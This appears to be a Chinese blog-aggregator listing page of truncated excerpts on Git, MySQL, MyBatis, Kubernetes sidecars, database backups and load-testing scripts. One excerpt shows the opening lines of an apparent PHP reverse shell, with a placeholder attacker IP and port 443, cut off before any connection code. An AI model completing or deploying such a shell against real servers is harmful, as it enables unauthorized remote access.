4. Git基本工作流程 Git工作区域 向仓库中添加文件流程 4. Git初始化及仓库创建和操作 基本信息设置 1. 设置用户名 git config --global user.name 'itcastphpgit1' 2. 设置用户名邮箱 git config --global user.em ...
分类:
其他好文 时间:
2021-07-05 19:01:11
阅读次数:
0
<?php error_reporting (E_ERROR); ignore_user_abort(true); ini_set('max_execution_time',0); $ipaddr = 'xxx.xxx.xxx.xxx'; $port = '443'; $msg = php_unam ...
1 <%@ page import="java.util.List" %> 2 <%@ page import="java.util.ArrayList" %><%-- 3 Created by IntelliJ IDEA. 4 User: yubaby 5 Date: 2021/7/3 6 Tim ...
分类:
编程语言 时间:
2021-07-05 18:54:36
阅读次数:
0
在购买服务器且安装了Mysql之后,并且安全组和防火墙都开放了端口,但是还是无法连接 原因就是mysql设置的就是只有本机可以连接 解决办法 # 1. 登录服务器,在服务器上登录mysql # 2. 使用user这个库 use user; # 3. 查看root账户 select host,user ...
分类:
数据库 时间:
2021-07-05 18:40:36
阅读次数:
0
1. Mybatis核心组件 1.1 Mybatis核心组件概述 SqlSessionFactoryBuilder(构造器):它会根据 配置或者代码来生成SqlSessionFactory,采用的是分布式构件的Builder模式。 SqlSessionFactory(工厂接口):依靠它来生成SqlS ...
分类:
其他好文 时间:
2021-07-05 18:37:30
阅读次数:
0
sidecar 模式 共享 网络 mount utc 不共享 ipc pid user apiVersion: v1 kind: Pod metadata: name: test-sidecar namespace: default spec: hostname: test-sidecar # 主机 ...
分类:
其他好文 时间:
2021-07-05 18:17:37
阅读次数:
0
完整备份 命令:innobackupex --defaults-file=/etc/my.cnf --user=root --password=PASSWORD --database=DATE BACK_DIR_PATH PASSWORD 数据库密码 DATE 数据库名 --database=DAT ...
分类:
其他好文 时间:
2021-07-05 17:46:48
阅读次数:
0
功能: 一.列相关: 1.追加列,左插列,右插列, 2.删除列 二.行相关: 1.追加行,上插行,下插行 2.删除行,删除所有空行,清空所有数据... 原理:根据对鼠标于 DataGridView 点击区域的判断来 对 点击列 或 点击行 的准确定位,再执行操作... 优点: 1.只需要 CellM ...
脚本基本构成 一个 Locust 测试脚本就是一个普通的 python 文件,它的基本组成十分简单: 定义用户的类型所有用户的属性都需要继承自 User Class,我们最常用的 HttpUser 也是如此,你也可以定义一个如 TcpUser,或者 WebSocketUser,甚至基于你测试的业务系 ...
分类:
其他好文 时间:
2021-07-02 16:40:41
阅读次数:
0
using System;using System.Collections.Generic;using System.ComponentModel;using System.Data;using System.Drawing;using System.IO;using System.Linq;usi ...